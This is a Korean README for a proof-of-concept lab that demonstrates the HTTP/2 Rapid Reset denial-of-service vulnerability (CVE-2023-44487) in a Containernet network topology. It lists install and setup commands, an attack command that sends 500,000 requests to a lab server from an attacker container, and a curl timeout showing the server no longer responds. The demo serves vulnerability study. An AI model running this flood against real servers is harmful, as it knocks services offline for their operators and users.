
HTTP/2 Rapid Reset DDoS 취약점에 대한 PoC - CVE-2023-44487
이 프로젝트는 Containernet으로 생성된 사용자 정의 네트워크 토폴로지를 사용하여 HTTP/2 Rapid Reset 서비스 거부(DoS) 공격을 시연합니다. 이 공격은 HTTP/2 프로토콜의 취약점을 악용하여 대상 서버를 압도해 응답 불가 상태로 만듭니다.

필요한 패키지를 설치하려면 다음 명령을 실행하십시오:
./install.sh
기본 설치 디렉토리를 변경하려면 다음과 같이 INSTALL_DIR 변수를 수정하면 됩니다:
INSTALL_DIR=/custom/path ./install.sh
인프라를 시작하려면 다음 명령을 실행하십시오:
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
공격을 시작하려면 공격자 컨테이너에서 다음 명령을 실행하십시오:
./attacker -url='https://modern.art:443/api' -requests=500000
잠시 후 curl을 사용하여 웹사이트에 접속하려고 하면 응답이 없게 됩니다.
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
인프라를 중지하려면 topo.py가 실행 중인 터미널에서 exit를 입력하면 됩니다.